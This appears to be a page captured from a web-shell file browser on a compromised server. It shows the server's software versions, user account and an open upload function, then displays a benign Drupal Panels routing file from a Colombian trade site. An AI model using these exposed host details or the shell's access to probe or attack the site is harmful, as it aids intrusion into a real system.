HEX
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips
System: Linux WORDPRESS 3.10.0-1160.118.1.el7.x86_64 #1 SMP Thu Apr 4 03:33:23 EDT 2024 x86_64
User: digital (1020)
PHP: 7.2.24
Disabled: NONE
Upload Files
File: /datos/www/fabricas.colombiatrade.com.co/public_html/modules/contrib/panels/panels.routing.yml
panels.select_block:
  path: '/admin/structure/panels/{tempstore_id}/{machine_name}/select_block'
  defaults:
    _controller: '\Drupal\panels\Controller\Panels::selectBlock'
    _title: 'Select block'
  requirements:
    _ctools_access: 'machine_name'
panels.add_block:
  path: '/admin/structure/panels/{tempstore_id}/{machine_name}/add/{block_id}'
  defaults:
    _form: '\Drupal\panels\Form\PanelsAddBlockForm'
    _title: 'Add block'
  requirements:
    _ctools_access: 'machine_name'
panels.edit_block:
  path: '/admin/structure/panels/{tempstore_id}/{machine_name}/edit/{block_id}'
  defaults:
    _form: '\Drupal\panels\Form\PanelsEditBlockForm'
    _title: 'Edit block'
  requirements:
    _ctools_access: 'machine_name'
panels.delete_block:
  path: '/admin/structure/panels/{tempstore_id}/{machine_name}/delete/{block_id}'
  defaults:
    _form: '\Drupal\panels\Form\PanelsDeleteBlockForm'
    _title: 'Delete block'
  requirements:
    _ctools_access: 'machine_name'